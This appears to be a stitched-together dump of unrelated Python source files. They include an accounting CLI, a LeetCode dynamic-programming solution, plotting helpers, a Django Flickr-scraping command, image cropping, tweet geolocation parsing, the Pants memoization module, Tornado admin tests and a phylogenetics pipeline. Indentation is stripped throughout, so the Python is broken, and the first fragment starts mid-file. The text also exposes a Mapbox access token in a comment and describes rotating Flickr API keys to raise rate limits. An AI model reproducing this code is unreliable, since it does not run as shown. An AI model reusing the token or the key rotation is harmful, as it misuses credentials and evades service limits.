document += "</div>"
document += document_end
with open(args.out, "w") as f:
f.write(document)
|
#!/usr/bin/python
import exceptions
import getopt
import sys
from wnodes import accounting
from wnodes.accounting import usage
from wnodes.accounting import record_format
from wnodes.accounting import message_format
from wnodes.accounting import requests
class ParsingError(exceptions.Exception):
pass
class InputError(exceptions.Exception):
pass
class Parser(object):
def __init__(self):
self.parameters = {}
self.parameters['version'] = accounting.get_version()
self.parameters['output_location'] = '.'
self.parameters['ZoneName'] = 'EU'
self.parameters['TimeZone'] = 'UTC'
def __do_parsing__(self):
try:
opts, args = getopt.getopt(sys.argv[1:],
"s:z:t:o:",
["help", "version",
"sitename=", "zonename=", "timezone=", "outputlocation="])
except getopt.GetoptError, err:
print str(err)
usage.get_usage(self.parameters)
sys.exit(2)
for opt, value in opts:
if opt in ("--help"):
usage.get_usage(self.parameters)
sys.exit(0)
elif opt in ("--version"):
print self.parameters['version']
sys.exit(0)
elif opt in ("-s", "--sitename"):
self.parameters['SiteName'] = value.strip()
elif opt in ("-z", "--zonename"):
self.parameters['ZoneName'] = value.strip()
elif opt in ("-t", "--timezone"):
self.parameters['TimeZone'] = value.strip()
elif opt in ("-o", "--outputlocation"):
self.parameters['output_location'] = value.strip()
else:
msg = 'The specified %s option is not recognized' % str(opt)
raise ParsingError(msg)
def __check_parameters__(self):
try:
if self.parameters['SiteName'] == '':
msg = ('The input %s cannot be empty. '
% 'SiteName'.lower() +
'Please use the option --help')
raise InputError(msg)
except KeyError, err:
msg = ('The input arguments are not provided. ' +
'Please use the option --help')
raise InputError(msg)
def get_parameters(self):
self.__do_parsing__()
self.__check_parameters__()
return self.parameters
if __name__ == '__main__':
try:
parameters = Parser().get_parameters()
#set image_lists needs to be substitute with calls to the NS and CM
#due to a temporary issue in the testbed the calls will be added later
image_lists = [('vm0','Pending','cloud','cloud',0,0)]
# DS: doc? what is this tuple supposed to mean?
build_requests = requests.Requests()
for request in image_lists:
build_requests.add_request(request=request)
records = []
for image in build_requests.get_images():
record = record_format.RecordFormat(SiteName=parameters['SiteName'],
ZoneName=parameters['ZoneName'],
TimeZone=parameters['TimeZone'],
MachineName=image['MachineName'],
Status=image['Status'],
LocalUserId=image['LocalGroupId'],
LocalGroupId=image['LocalGroupId'],
StartTime=image['StartTime'],
EndTime=image['EndTime'])
records.append(record.get_information())
build_message = message_format.MessageFormat(records_list=records)
build_message.store_in_file(parameters['output_location'])
except KeyError, err:
print err, '\n'
except InputError, err:
print err, '\n'
except ParsingError, err:
print err, '\n'
except requests.RequestsError, err:
print err, '\n'
except MessageStoreError, err:
print err, '\n'
except KeyboardInterrupt:
print '\n\nExecution n!'
sys.exit(1)
|
class Solution:
def mincostTickets(self, days: List[int], costs: List[int]) -> int:
_1day_pass, _7day_pass, _30day_pass = 0, 1, 2
# Predefined constant to represent not-traverling day
NOT_Traveling_Day = -1
maxdays = days[-1]
# DP Table, record for minimum cost of ticket to travel
dp_cost = [NOT_Traveling_Day for _ in range(maxdays+1)]
# base case:
# no cost before travel
dp_cost[0] = 0
for day in days:
# initialized to 0 for traverling days
dp_cost[day] = 0
# Solve min cost by Dynamic Programming
for day_i in range(1, maxdays+1):
if dp_cost[day_i] == NOT_Traveling_Day:
# today is not traveling day
# no extra cost
dp_cost[day_i] = dp_cost[day_i - 1]
else:
# today is traveling day
# compute optimal cost by DP
dp_cost[day_i] = min( dp_cost[ day_i - 1 ] + costs[ _1day_pass ],
dp_cost[ max(day_i - 7, 0) ] + costs[ _7day_pass ],
dp_cost[ max(day_i - 30, 0) ] + costs[ _30day_pass ] )
# Cost on last day of this year is the answer
return dp_cost[maxdays] |
#!/usr/bin/env python
import pandas as pd
from rpy2 import robjects
import rpy2.robjects.lib.ggplot2 as gg2
from rpy2.robjects.packages import importr
import pandas.rpy.common as common
require = robjects.r['require']
require('ggplot2')
pdf = robjects.r['pdf']
grdevices = importr('grDevices')
dev_off = robjects.r['dev.off']
ordered = robjects.r['ordered']
ggtitle = robjects.r['ggtitle']
xlabel = robjects.r['xlab']
ylabel = robjects.r['ylab']
seq = robjects.r['seq']
def line_plot(pdf_file, data, x, y, var,
null_label="N/A",
linetype = None,
title=None,
xlab=None,
ylab=None,
colorname=None,
linename=None,
**extra_aes_params):
pdf(pdf_file, width=11.7, height=8.3, paper="a4r")
if any(data[x].isnull()):
labels = [null_label] + map(str, sorted(set(data[data[x].notnull()][x])))
labels = robjects.StrVector(labels)
nulls = data[x].isnull()
label_vals = dict(zip(labels, range(len(labels))))
data[x] = data[x].astype("str")
data[x][nulls] = null_label
data['sortcol'] = data[x].map(label_vals.__getitem__)
data.sort('sortcol', inplace=True)
else:
labels = None
if linetype and linetype != var:
data['group'] = data[var].map(str) + data[linetype].map(str)
else:
data['group'] = data[var]
rdata = common.convert_to_r_dataframe(data)
if labels:
ix = rdata.names.index(x)
rdata[ix] = ordered(rdata[ix], levels=labels)
gp = gg2.ggplot(rdata)
pp = (gp + gg2.geom_point(size=3) +
gg2.scale_colour_hue(name=(colorname or var)) +
#gg2.scale_colour_continuous(low="black") +
gg2.aes_string(x=x, y=y, color=var, variable=var) +
ggtitle(title or "") +
xlabel(xlab or x) +
ylabel(ylab or y) #+
#gg2.scale_y_continuous(breaks=seq(0.0, 1.0, 0.05))
)
# line type stuff
if linetype:
pp += gg2.geom_path(gg2.aes_string(group='group', linetype=linetype), size=0.5)
pp += gg2.scale_linetype(name=(linename or linetype))
else:
pp += gg2.geom_path(gg2.aes_string(group='group'), size=0.5)
pp.plot()
dev_off()
|
from argparse import ArgumentParser
from multiprocessing.pool import ThreadPool
from threading import Lock
from typing import Text
import pendulum
from django.contrib.gis.geos import Point
from django.core.management import BaseCommand
from django.db.transaction import atomic
from tqdm import tqdm
from ...flickr import Flickr
from ...models import Area, Image, Tile
class Command(BaseCommand):
"""
This is where the scanning of the whole Flickr database happens.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.insert_lock = Lock()
def get_area(self, slug: Text) -> Area:
"""
Transforms an area slug into a real area object. To be used by the
arguments parser.
"""
try:
return Area.objects.get(name=slug)
except Area.DoesNotExist:
raise ValueError(f'No area with the name "{slug}" exist.')
def add_arguments(self, parser: ArgumentParser):
parser.add_argument(
"-a", "--area", help="Name of the area to parse", type=self.get_area
)
def handle(self, area: Area, *args, **options):
"""
Root function. It will simply scan one by one each level until the max
depth is reached.
"""
try:
print(f'Getting content for "{area}"')
for level in range(0, Tile.MAX_DEPTH + 1):
self.handle_level(level, area)
finally:
f = Flickr.instance()
f.stop_generating_keys()
def handle_level(self, level: int, area: Area) -> None:
"""
Handles a single level. It will evaluate all the tiles found in this
level. If the tile intersects the scanned area then the tile is
handled, otherwise the scanning is deferred to another scan which would
require this tile to be scanned.
Notes
-----
As the Flickr API is fairly slow and the amount of data to download is
pretty big, the Flickr class allows for:
- Rotating API keys in order to increase the rate limit a little bit
- Being called from several threads but still maintain the rate limit
on each key
The parallelism happens at the tiles level: a thread pool will run each
tile in a separate thread.
"""
print("")
print(f"--> Level {level}")
tiles = Tile.objects.filter(depth=level, status=Tile.TO_PROBE).order_by(
"y", "x"
)
def handle_tile(tile: Tile):
if tile.polygon.intersects(area.area):
self.handle_tile(tile)
with ThreadPool(Flickr.instance().keys_count * 3) as pool:
for _ in tqdm(
pool.imap_unordered(handle_tile, tiles),
total=tiles.count(),
unit="tile",
smoothing=0.01,
):
pass
def handle_tile(self, tile: Tile):
"""
Basically, for each tile two things can happen: either the tile has
less than MAX_SEARCH_RESULTS search results (the value is empirical
to give good results with the Flickr API which is working more or less
will under such extreme conditions), either the tile has more in which
case it needs to be split.
If the tile needs to be split then children are created and they will
be scanned when moving down to the next level.
There is one specificity though: if the children were not created
because the max depth has been reached, then we gather the first
MAX_SEARCH_RESULTS items and mark the tile as done. Tiles with such
an image density will stand out either way.
"""
f = Flickr.instance()
kwargs = {
"bbox": tile.bbox,
"extras": ["geo", "date_taken", "url_q", "url_z", "url_b", "count_faves"],
}
info = f.search(page=1, **kwargs)
harvest = True
if int(info["photos"]["total"]) > Flickr.MAX_SEARCH_RESULTS:
harvest = not tile.can_have_children
seen = set()
to_insert = []
if harvest:
for page in range(
0,
min(
int(info["photos"]["pages"]),
int(Flickr.MAX_SEARCH_RESULTS / Flickr.PER_PAGE),
),
):
if page == 0:
photos = info
else:
photos = f.search(page=page + 1, **kwargs)
assert len(photos["photos"]["photo"]) <= Flickr.PER_PAGE
for photo in photos["photos"]["photo"]:
photo_id = int(photo["id"])
if photo_id not in seen:
seen.add(photo_id)
to_insert.append(photo)
def make_images():
"""
This is done in a generator because sometimes you might get
a parsing error on an image, in which case you don't want
a single image to crash the whole thing.
"""
for image in to_insert:
try:
if int(image["id"]) not in existing:
yield Image(
flickr_id=int(image["id"]),
coords=Point(
(float(image["longitude"]), float(image["latitude"]))
),
date_taken=pendulum.parse(image["datetaken"], tz="UTC"),
data=image,
faves=int(image.get("count_faves", 0)),
)
except (ValueError, TypeError):
pass
with self.insert_lock, atomic():
if not harvest:
tile.need_children()
else:
existing = set(
Image.objects.filter(flickr_id__in=seen).values_list(
"flickr_id", flat=True
)
)
Image.objects.bulk_create(make_images())
tile.mark_done()
|
"""
Created by Alex Wang on 2018-06-01
"""
import os
import sys
import traceback
from collections import Counter
import time
import cv2
import numpy as np
def crop_image(img, debug=False, plot=False):
"""
:param img:
:param debug:
:param plot:
:return:
"""
try:
ratio = 4
time_one = time.time()
img_resize = cv2.resize(img, (0, 0), fx=1.0/ratio, fy=1.0/ratio)
img_org = img.copy()
img_gray = cv2.cvtColor(img_resize, cv2.COLOR_BGR2GRAY)
ret, img_mask = cv2.threshold(img_gray, 240, 255, cv2.THRESH_BINARY)
height, width = img_resize.shape[0:2]
mask = np.zeros([height + 2, width + 2, 1], np.uint8)
time_two = time.time()
flood_y = int(height / 2)
for x in range(50, width - 50, 10):
# print(img_mask[y, flood_x])
cv2.circle(img_mask, (x, flood_y), 2, 0, thickness=3)
# print(img_mask[x, flood_y])
if img_mask[flood_y, x] == 0:
cv2.floodFill(img_mask, mask, (x, flood_y), 128, cv2.FLOODFILL_MASK_ONLY)
time_three = time.time()
gray_idx = np.argwhere(img_mask == 128)
print(len(gray_idx))
time_four = time.time()
# print(gray_idx)
x_idx, y_idx = zip(*gray_idx)
# min_x = min(x_idx)
# max_x = max(x_idx)
# min_y = min(y_idx)
# max_y = max(y_idx)
x_counter = Counter(x_idx)
x_counter_filter = {key: value for key, value in x_counter.items() if value > 10}
y_counter = Counter(y_idx)
y_counter_filter = {key: value for key, value in y_counter.items() if value > 10}
min_x = min(x_counter_filter.keys())
max_x = max(x_counter_filter.keys())
min_y = min(y_counter_filter.keys())
max_y = max(y_counter_filter.keys())
img_new = img_org[min_x * ratio:max_x * ratio, min_y * ratio:max_y * ratio, :]
if debug:
print('img height:{}, img width:{}'.format(height, width))
print('min_x:{}, max_x:{}, min_y:{}, max_y:{}'.format(min_x, max_x, min_y, max_y))
time_five = time.time()
height_threshold = int(height * 0.12)
width_threshold = int(width * 0.1)
if debug:
print('threshold cost time:{}, flood fill cost time:{}, argwhere cost time:{}, '
'counter cost time:{}'.
format((time_two - time_one), (time_three - time_two),
(time_four - time_three), (time_five - time_four)))
print('height_threshold:{}, width_threshold:{}'.format(height_threshold, width_threshold))
if plot:
cv2.imshow('img_org', img)
cv2.imshow('img_mask', img_mask)
cv2.imshow('img_new', img_new)
cv2.waitKey(0)
cv2.destroyAllWindows()
if min_x > height_threshold or (height - max_x) > height_threshold \
or min_y > width_threshold or (width - max_y) > width_threshold:
if debug:
print('white edge too large, return None.')
return None, False
return img_new, True
except Exception as e:
traceback.print_exc()
return None, False
def test_batch(dir_path, debug=False, plot=False):
"""
:param dir_path:
:param debug:
:param plot:
:return:
"""
save_dir = '/Users/alexwang/data/image_split/white_edge_crop_result'
if not os.path.exists(save_dir):
os.makedirs(save_dir)
file_name_list = [
'TB22IW5d3nH8KJjSspcXXb3QFXa_!!681671909.jpg',
'TB2fsQWrASWBuNjSszdXXbeSpXa_!!1830643265.jpg',
'TB2jmU1ruSSBuNjy0FlXXbBpVXa_!!3476998202.jpg',
'TB2MaBIreSSBuNjy0FlXXbBpVXa_!!1768687087.jpg'
]
# file_name_list = [
# 'TB2dG9nfEOWBKNjSZKzXXXfWFXa_!!2564807339.jpg',
# 'TB2E6TIdY5YBuNjSspoXXbeNFXa_!!678523567.jpg',
# 'TB2fsQWrASWBuNjSszdXXbeSpXa_!!1830643265.jpg',
# 'TB2FWYYrbGYBuNjy0FoXXciBFXa_!!1695755196.jpg',
# 'TB2gmfmquuSBuNjSsplXXbe8pXa_!!1665834141.jpg',
# 'TB2jmU1ruSSBuNjy0FlXXbBpVXa_!!3476998202.jpg',
# 'TB2MaBIreSSBuNjy0FlXXbBpVXa_!!1768687087.jpg',
# 'TB2mIBWfyMnBKNjSZFoXXbOSFXa_!!2624818026.jpg'
# ]
file_name_list = [
'TB2.5kyppOWBuNjy0FiXXXFxVXa_!!3571500344.jpg',
'TB2.XmpcHSYBuNjSspiXXXNzpXa_!!2244221894.jpg',
'TB22uCGqHSYBuNjSspiXXXNzpXa_!!2871469722.jpg',
'TB2_u5nouuSBuNjy1XcXXcYjFXa_!!2207560322.jpg',
'TB2aNCCntqUQKJjSZFIXXcOkFXa_!!2655745701.jpg',
'TB2ARccrDtYBeNjy1XdXXXXyVXa_!!2488474519.jpg',
'TB2BWPqolHH8KJjy0FbXXcqlpXa_!!2964419525.jpg',
'TB2ccv2X7v85uJjSZFPXXch4pXa_!!2917031043.jpg',
'TB2CKu0rpuWBuNjSszbXXcS7FXa_!!2197260583.jpg',
'TB2dG9nfEOWBKNjSZKzXXXfWFXa_!!2564807339.jpg',
'TB2E6TIdY5YBuNjSspoXXbeNFXa_!!678523567.jpg',
'TB2ebcNrbGYBuNjy0FoXXciBFXa_!!1974378418.jpg',
'TB2fsQWrASWBuNjSszdXXbeSpXa_!!1830643265.jpg',
'TB2FWYYrbGYBuNjy0FoXXciBFXa_!!1695755196.jpg',
'TB2gmfmquuSBuNjSsplXXbe8pXa_!!1665834141.jpg',
'TB2jmU1ruSSBuNjy0FlXXbBpVXa_!!3476998202.jpg',
'TB2L1MpbiMnBKNjSZFCXXX0KFXa_!!3399312947.jpg',
'TB2MaBIreSSBuNjy0FlXXbBpVXa_!!1768687087.jpg',
'TB2mIBWfyMnBKNjSZFoXXbOSFXa_!!2624818026.jpg',
'TB2NkeKi3mTBuNjy1XbXXaMrVXa_!!2676392390.jpg',
'TB2Oa0XqStYBeNjSspaXXaOOFXa_!!495464744.jpg',
'TB2VsYPisjI8KJjSsppXXXbyVXa_!!65866399.jpg',
'TB2wN0BqQyWBuNjy0FpXXassXXa_!!2519883254.jpg',
'TB283O3b_qWBKNjSZFxXXcpLpXa_!!3564256353.jpg'
]
# for file_name in file_name_list:
for file_name in os.listdir(dir_path):
file_path = os.path.join(dir_path, file_name)
print('file_path:', file_path)
img = cv2.imread(file_path)
start_time = time.time()
img_result, succeed = crop_image(img, debug, plot)
end_time = time.time()
print('cost time:{}'.format(end_time - start_time))
if succeed:
cv2.imwrite(os.path.join(save_dir, file_name), img_result)
if __name__ == '__main__':
test_batch('/Users/alexwang/data/image_split/white_edge_data', debug=True, plot=False)
|
import json
import pandas as pd
from collections import OrderedDict
import plotly.express as px
# reading the JSON data using json.load()
data = {}
data['lat'] = []
data['long'] = []
data['city'] = []
data['state'] = []
data['country'] = []
input_path = 'opiates_2020_3_1_.txt'
with open(input_path, 'r') as f:
lines = f.readlines()
for line in lines:
line = line.strip()
jo = json.loads(line, object_pairs_hook=OrderedDict)
try:
data['long'].append(jo['place']['bounding_box']['coordinates'][0][0][0])
data['lat'].append(jo['place']['bounding_box']['coordinates'][0][0][1])
data['city'].append(jo['place']['full_name'].split(',')[0])
data['state'].append(jo['place']['full_name'].split(',')[1])
data['country'].append(jo['place']['country_code'])
except TypeError:
data['long'].append(None)
data['lat'].append(None)
data['city'].append(None)
data['state'].append(None)
data['country'].append(None)
# data_df = pd.DataFrame.from_dict(data).dropna()
# px.set_mapbox_access_token('pk.eyJ1IjoidGFubW95c3IiLCJhIjoiY2s5aDc2cjZoMHMzMTNscGhtcTA0MHZkOSJ9.ElGEgw3N2aEk1hFLjB7vng')
# # df = px.data.carshare()
# # fig = px.scatter_mapbox(df, lat="centroid_lat", lon="centroid_lon", color="peak_hour", size="car_hours",
# # color_continuous_scale=px.colors.cyclical.IceFire, size_max=15, zoom=10)
#
# fig = px.scatter_mapbox(data_df, lat="lat", lon="long",color_continuous_scale=px.colors.cyclical.IceFire, size_max=15, zoom=10)
# fig.show() |
from pyglet.gl import *
from creatures import Wall
from animation_example import Tween, ease_none, ease_in_quad
class Render(object):
def __init__(self, game_data):
"""
width, height: dimension in tiles
background: background image to use
"""
self.window = game_data["window"]
self.game_data = game_data
self.game = game_data["game"]
self.width = self.window.width
self.height = self.window.height
self.game.add_handler(self)
self.sprite = pyglet.sprite.Sprite(self.game_data['data']['agents']['Monster01']['animations']['Monster_Up1.png'], 100, 100)
self.Tween = Tween(self.sprite, "x", ease_in_quad, self.sprite.x, self.sprite.x+200, 5, True, False, "Testobj1")
self.Tween2 = Tween(self.sprite, "y", ease_none, self.sprite.y, self.sprite.y+100, 10, True, False, "Testobj2")
self.Tween.start()
self.Tween2.start()
#def __init__(self, obj, prop, func, begin, finish, duration, use_seconds, looping=False, name=None)
def on_draw(self):
glColor3f(1.0, 1.0, 1.0)
glPushMatrix()
#Tile.tile_batch.draw()
#EffectsManager.effects_batch.draw()
#Bug.bug_batch.draw()
Wall.object_batch.draw()
self.sprite.draw()
#Creature.creature_batch.draw()
#Add in animation code
glPopMatrix()
glLoadIdentity()
|
import random as rand
testcase = list(map(int,input("Enter the list of integers : ").split()))
flag = 1
for i in testcase:
if i<5 or i>100:
flag = 0
random_list=[]
for i in range(len(testcase)):
random_list.append(testcase[rand.randint(0,len(testcase)-1)])
ans = 0
for i in range(len(testcase)):
if testcase[i]==random_list[i]:
ans+=1
ans = ans/len(testcase)
if flag:
print(random_list)
print(ans)
else:
print("-1")
|
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import functools
import inspect
from contextlib import contextmanager
from typing import Any, Callable, Optional, TypeVar
from pants.util.meta import T, classproperty
FuncType = Callable[..., Any]
F = TypeVar("F", bound=FuncType)
# Used as a sentinel that disambiguates tuples passed in *args from coincidentally matching tuples
# formed from kwargs item pairs.
_kwargs_separator = (object(),)
def equal_args(*args, **kwargs):
"""A memoized key factory that compares the equality (`==`) of a stable sort of the
parameters."""
key = args
if kwargs:
key += _kwargs_separator + tuple(sorted(kwargs.items()))
return key
class InstanceKey:
"""An equality wrapper for an arbitrary object instance.
This wrapper leverages `id` and `is` for fast `__hash__` and `__eq__` but both of these rely on
the object in question not being gc'd since both `id` and `is` rely on the instance address
which can be recycled; so we retain a strong reference to the instance to ensure no recycling
can occur.
"""
def __init__(self, instance):
self._instance = instance
self._hash = id(instance)
def __hash__(self):
return self._hash
def __eq__(self, other):
if self._instance is other:
return True
if isinstance(other, InstanceKey):
return self._instance is other._instance
return False
def per_instance(*args, **kwargs):
"""A memoized key factory that works like `equal_args` except that the first parameter's
identity is used when forming the key.
This is a useful key factory when you want to enforce memoization happens per-instance for an
instance method in a class hierarchy that defines a custom `__hash__`/`__eq__`.
"""
instance_and_rest = (InstanceKey(args[0]),) + args[1:]
return equal_args(*instance_and_rest, **kwargs)
def memoized(func: Optional[F] = None, key_factory=equal_args, cache_factory=dict) -> F:
"""Memoizes the results of a function call.
By default, exactly one result is memoized for each unique combination of function arguments.
Note that memoization is not thread-safe and the default result cache will grow without bound;
so care must be taken to only apply this decorator to functions with single threaded access and
an expected reasonably small set of unique call parameters.
Note that the wrapped function comes equipped with 3 helper function attributes:
+ `put(*args, **kwargs)`: A context manager that takes the same arguments as the memoized
function and yields a setter function to set the value in the
memoization cache.
+ `forget(*args, **kwargs)`: Takes the same arguments as the memoized function and causes the
memoization cache to forget the computed value, if any, for those
arguments.
+ `clear()`: Causes the memoization cache to be fully cleared.
:API: public
:param func: The function to wrap. Only generally passed by the python runtime and should be
omitted when passing a custom `key_factory` or `cache_factory`.
:param key_factory: A function that can form a cache key from the arguments passed to the
wrapped, memoized function; by default uses simple parameter-set equality;
ie `equal_args`.
:param cache_factory: A no-arg callable that produces a mapping object to use for the memoized
method's value cache. By default the `dict` constructor, but could be a
a factory for an LRU cache for example.
:raises: `ValueError` if the wrapper is applied to anything other than a function.
:returns: A wrapped function that memoizes its results or else a function wrapper that does this.
"""
if func is None:
# We're being applied as a decorator factory; ie: the user has supplied args, like so:
# >>> @memoized(cache_factory=lru_cache)
# ... def expensive_operation(user):
# ... pass
# So we return a decorator with the user-supplied args curried in for the python decorator
# machinery to use to wrap the upcoming func.
#
# NB: This is just a tricky way to allow for both `@memoized` and `@memoized(...params...)`
# application forms. Without this trick, ie: using a decorator class or nested decorator
# function, the no-params application would have to be `@memoized()`. It still can, but need
# not be and a bare `@memoized` will work as well as a `@memoized()`.
return functools.partial( # type: ignore[return-value]
memoized, key_factory=key_factory, cache_factory=cache_factory
)
if not inspect.isfunction(func):
raise ValueError("The @memoized decorator must be applied innermost of all decorators.")
key_func = key_factory or equal_args
memoized_results = cache_factory() if cache_factory else {}
@functools.wraps(func)
def memoize(*args, **kwargs):
key = key_func(*args, **kwargs)
if key in memoized_results:
return memoized_results[key]
result = func(*args, **kwargs)
memoized_results[key] = result
return result
@contextmanager
def put(*args, **kwargs):
key = key_func(*args, **kwargs)
yield functools.partial(memoized_results.__setitem__, key)
memoize.put = put # type: ignore[attr-defined]
def forget(*args, **kwargs):
key = key_func(*args, **kwargs)
if key in memoized_results:
del memoized_results[key]
memoize.forget = forget # type: ignore[attr-defined]
def clear():
memoized_results.clear()
memoize.clear = clear # type: ignore[attr-defined]
return memoize # type: ignore[return-value]
def memoized_method(func: Optional[F] = None, key_factory=per_instance, cache_factory=dict) -> F:
"""A convenience wrapper for memoizing instance methods.
Typically you'd expect a memoized instance method to hold a cached value per class instance;
however, for classes that implement a custom `__hash__`/`__eq__` that can hash separate instances
the same, `@memoized` will share cached values across `==` class instances. Using
`@memoized_method` defaults to a `per_instance` key for the cache to provide the expected cached
value per-instance behavior.
Applied like so:
>>> class Foo:
... @memoized_method
... def name(self):
... pass
Is equivalent to:
>>> class Foo:
... @memoized(key_factory=per_instance)
... def name(self):
... pass
:API: public
:param func: The function to wrap. Only generally passed by the python runtime and should be
omitted when passing a custom `key_factory` or `cache_factory`.
:param key_factory: A function that can form a cache key from the arguments passed to the
wrapped, memoized function; by default `per_instance`.
:param kwargs: Any extra keyword args accepted by `memoized`.
:raises: `ValueError` if the wrapper is applied to anything other than a function.
:returns: A wrapped function that memoizes its results or else a function wrapper that does this.
"""
return memoized(func=func, key_factory=key_factory, cache_factory=cache_factory)
def memoized_property(
func: Optional[Callable[..., T]] = None, key_factory=per_instance, cache_factory=dict
) -> T:
"""A convenience wrapper for memoizing properties.
Applied like so:
>>> class Foo:
... @memoized_property
... def name(self):
... pass
Is equivalent to:
>>> class Foo:
... @property
... @memoized_method
... def name(self):
... pass
Which is equivalent to:
>>> class Foo:
... @property
... @memoized(key_factory=per_instance)
... def name(self):
... pass
By default a deleter for the property is setup that un-caches the property such that a subsequent
property access re-computes the value. In other words, for this `now` @memoized_property:
>>> import time
>>> class Bar:
... @memoized_property
... def now(self):
... return time.time()
You could write code like so:
>>> bar = Bar()
>>> bar.now
1433267312.622095
>>> time.sleep(5)
>>> bar.now
1433267312.622095
>>> del bar.now
>>> bar.now
1433267424.056189
>>> time.sleep(5)
>>> bar.now
1433267424.056189
>>>
:API: public
:param func: The property getter method to wrap. Only generally passed by the python runtime and
should be omitted when passing a custom `key_factory` or `cache_factory`.
:param key_factory: A function that can form a cache key from the arguments passed to the
wrapped, memoized function; by default `per_instance`.
:param kwargs: Any extra keyword args accepted by `memoized`.
:raises: `ValueError` if the wrapper is applied to anything other than a function.
:returns: A read-only property that memoizes its calculated value and un-caches its value when
`del`ed.
"""
getter = memoized_method(func=func, key_factory=key_factory, cache_factory=cache_factory)
return property( # type: ignore[return-value]
fget=getter,
fdel=lambda self: getter.forget(self), # type: ignore[attr-defined, no-any-return]
)
# TODO[13244]: fix type hint issue when using @memoized_classmethod and friends
def memoized_classmethod(
func: Optional[F] = None, key_factory=per_instance, cache_factory=dict
) -> F:
return classmethod( # type: ignore[return-value]
memoized_method(func, key_factory=key_factory, cache_factory=cache_factory)
)
def memoized_classproperty(
func: Optional[Callable[..., T]] = None, key_factory=per_instance, cache_factory=dict
) -> T:
return classproperty(
memoized_classmethod(func, key_factory=key_factory, cache_factory=cache_factory)
)
def testable_memoized_property(
func: Optional[Callable[..., T]] = None, key_factory=per_instance, cache_factory=dict
) -> T:
"""A variant of `memoized_property` that allows for setting of properties (for tests, etc)."""
getter = memoized_method(func=func, key_factory=key_factory, cache_factory=cache_factory)
def setter(self, val):
with getter.put(self) as putter:
putter(val)
return property( # type: ignore[return-value]
fget=getter,
fset=setter,
fdel=lambda self: getter.forget(self), # type: ignore[attr-defined, no-any-return]
)
|
import json
from urllib.parse import urlencode
from tornado.httputil import HTTPHeaders
from tests import BasicTestsClass, login_data_admin_valid, registry_new_user, login_data_user_valid
class TestsAdminMethods(BasicTestsClass):
""" Кейс тестов для методов администратора
"""
def setUp(self) -> None:
super().setUp()
# Сформируем заголовок с токеном администратора
response = self.fetch('/v1/user/auth', method="POST", body=urlencode(login_data_admin_valid))
response_json = json.loads(response.body)
self.headers = HTTPHeaders({'auth-token': response_json['auth-token']})
def test_v1_admin_delete_user(self):
response = self.fetch('/v1/admin/delete_user', method="POST",
body=urlencode({'email': registry_new_user['email']}), headers=self.headers)
response_json = json.loads(response.body)
self.assertEqual(response.code, 200)
self.assertEqual(response_json['status'], 'success')
def test_v1_admin_delete_user_again(self):
response = self.fetch('/v1/admin/delete_user', method="POST",
body=urlencode({'email': registry_new_user['email']}), headers=self.headers)
response_json = json.loads(response.body)
self.assertEqual(response.code, 404)
self.assertEqual(response_json['type'], 'user_not_found')
def test_v1_admin_delete_not_admin(self):
# Сформируем заголовок с токеном пользователя
response = self.fetch('/v1/user/auth', method="POST", body=urlencode(login_data_user_valid))
response_json = json.loads(response.body)
self.headers = HTTPHeaders({'auth-token': response_json['auth-token']})
response = self.fetch('/v1/admin/delete_user', method="POST",
body=urlencode({'email': registry_new_user['email']}), headers=self.headers)
response_json = json.loads(response.body)
self.assertEqual(response.code, 403)
self.assertEqual(response_json['type'], 'access_denied')
|
__author__ = 'AmmiNi'
import unittest
import TwitterMessenger
import FacebookMessenger
class TestSNS(unittest.TestCase):
def test_twitter(self):
twitter_client = TwitterMessenger.TwitterMessenger()
raised = False
try:
twitter_client.tweet("test message2")
except:
raised = True
self.assertEqual(raised, False)
self.assertRaises(Exception, twitter_client.tweet("test message2"))
def test_facebook(self):
facebook_client = FacebookMessenger.FacebookMessenger()
raised = False
try:
facebook_client.post_message("test message2")
except:
raised = True
self.assertEqual(raised, False)
if __name__ == '__main__':
unittest.main() |
import re
txt = """Tomás alias San Nicolas fue Capaz de ir con el Capataz
haciendolo andar de altas
"""
parrafo = txt.split()
for palabra in parrafo:
coincidencia = re.findall("(á|a)(s|z)", palabra)
if coincidencia:
print(palabra) |
# Structure of the arguments: python3 pipeline.py data_folder genes_list
import subprocess
import glob
import os
import ntpath
import statistics
from Bio import SeqIO
from Bio import AlignIO
############################################################################################################################################
def BuildingTrees(myInputBT):
aligned_tmp_file = "/tmp/Aligned.fasta"
trimmed_tmp_file = "/tmp/Trimmed.fasta"
#Sequences length standard deviation
list_sd = list()
for rec in SeqIO.parse(myInputBT, 'fasta'):
seqLen = len(rec)
list_sd.append(int(seqLen))
stdev = statistics.stdev(list_sd)
# 1. Alignment
cmd = ['mafft', '--maxiterate', '1000', '--globalpair', myInputBT]
with open(aligned_tmp_file, 'w+') as f:
p1 = subprocess.Popen(cmd, stdout=f,
stderr=subprocess.DEVNULL)
p1.communicate()
# 2. Trimming
cmd = ['trimal', '-automated1', '-in', aligned_tmp_file]
with open(trimmed_tmp_file, 'w+') as f:
p2 = subprocess.Popen(cmd, stdout=f)
p2.communicate()
#Trimmed alignment length
alignment = AlignIO.read(trimmed_tmp_file, 'fasta')
trimmed_length = alignment.get_alignment_length()
# Identity
identity_count = 0
for i in range(0, trimmed_length):
nuc_set = set()
for species in alignment:
nuc_set.add(str(species.seq[i]))
if len(nuc_set) == 1:
identity_count += 1
identity = identity_count / trimmed_length
# 3. Tree construction for multithreading add '-T', '8'
cmd = ['raxml', '-p', '12345', '-m', 'PROTGAMMAWAG', '-#', '100', '-s', trimmed_tmp_file, '-f', 'a', '-x', '12345',
'-n', ntpath.basename(myInputBT), '-o', 'Drosophila_melanogaster']
p3 = subprocess.Popen(cmd)
p3.communicate()
# 4. Tree certainty for multithreading add '-T', '8'
cmd = ['raxml', '-b', '12345', '-m', 'PROTGAMMAWAG', '-#', '100', '-f', 'i',
'-n', 'TC', '-z', 'RAxML_bootstrap.' + ntpath.basename(myInputBT), '-t', 'RAxML_BestTree.' + ntpath.basename(myInputBT), '-L', 'MR']
p4 = subprocess.Popen(cmd)
p4.communicate()
# 5. Parse TC file and extract relative tree certainty
with open("RAxML_info.TC") as tc_file:
for line in tc_file.readlines():
if line.startswith("Relative tree certainty for this tree:"):
tree_certainty = line.split(" ")[-1]
# 6. Output
file_r = open(myInputBT + '.result','w')
file_r.write("Standard deviation of protein length: ")
file_r.write(str(stdev))
file_r.write("\n")
file_r.write("Trimmed alignment length: ")
file_r.write(str(trimmed_length))
file_r.close()
